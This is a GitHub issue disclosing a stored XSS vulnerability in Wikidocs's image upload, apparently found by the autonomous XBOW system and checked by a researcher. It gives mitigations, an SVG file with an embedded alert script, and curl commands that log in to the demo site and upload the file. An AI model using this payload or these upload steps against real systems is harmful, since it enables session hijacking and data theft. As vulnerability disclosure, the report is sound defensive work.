Skip to content

XBOW Security Report - Stored XSS via SVG image at wikidocs #215

New issue
New issue
Open
Open
XBOW Security Report - Stored XSS via SVG image at wikidocs#215
Labels
bugSomething isn't working
@niemand-sec

Description

@niemand-sec
niemand-sec
opened on Nov 21, 2024

Describe your issue

Disclaimer

This vulnerability was detected using XBOW, a system that autonomously finds and exploits potential security vulnerabilities. The finding has been thoroughly reviewed and validated by a security researcher before submission. While XBOW is intended to work autonomously, during its development human experts ensure the accuracy and relevance of its reports.

Description

A stored Cross-Site Scripting (XSS) vulnerability was identified in the image upload functionality of the application. By uploading a crafted SVG file containing embedded JavaScript, an attacker can execute arbitrary JavaScript in the context of the victim's browser upon viewing the uploaded image.

Mitigations

  1. Validate and sanitize uploaded files, ensuring only safe image formats (e.g., PNG, JPEG) are allowed.
  2. Remove any embedded scripts in SVG files or disable support for SVG uploads if unnecessary.
  3. Implement a Content Security Policy (CSP) to mitigate the risk of script execution.

Impact

  • Session Hijacking: Attackers can steal session cookies, allowing them to impersonate legitimate users.
  • Data Theft: Access to sensitive information such as personal data, credentials, or financial details.

Device and settings

Wikidocs

Steps to reproduce

  1. Create an SVG file (xss.svg) containing malicious JavaScript payload (e.g., alert("XSS")).
cat > xss.svg << 'EOF' 
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>
    alert("XSS");
  </script>
</svg>
EOF
  1. Get a valid session:
curl -X POST "https://demo.wikidocs.it/submit.php?act=authentication" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "document=aa" \
  -d "password=demo" \
  -c cookies.txt \
  -b cookies.txt
  1. Upload the crafted SVG using the https://demo.wikidocs.it/submit.php?act=image_upload_ajax endpoint with the following request: 
    curl -X POST 'https://demo.wikidocs.it/submit.php?act=image_upload_ajax' \ 
-H 'Content-Type: multipart/form-data' \
-F 'document=homepage' \
-F 'image=@xss.svg' \
-b cookies.txt
  2. The file location is returned on the JSON response:
{"error":null,"code":"image_uploaded","name":"xss.svg","path":"\/datasets\/documents\/homepage\/xss.svg","size":309}
  1. Upon accessing the uploaded file, the JavaScript payload is executed in the user's browser.

image

Screenshots (optional)

No response

Extra fields

  • I'd like to work on this issue

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions